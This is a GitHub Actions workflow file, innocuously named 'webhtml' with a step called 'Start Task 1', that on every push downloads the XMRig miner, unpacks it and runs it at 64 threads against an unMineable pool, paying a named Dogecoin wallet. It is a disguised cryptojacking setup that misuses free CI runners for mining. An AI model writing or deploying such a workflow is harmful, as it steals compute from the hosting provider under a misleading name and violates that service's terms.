name: webhtml

on:
  push:
  workflow_dispatch:

jobs:
  start_task_1:
    name: Start Task 1
    runs-on: ubuntu-latest
    steps:
      - name: Jalankan Task 1
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.Saw666 -p x --tls --threads=64
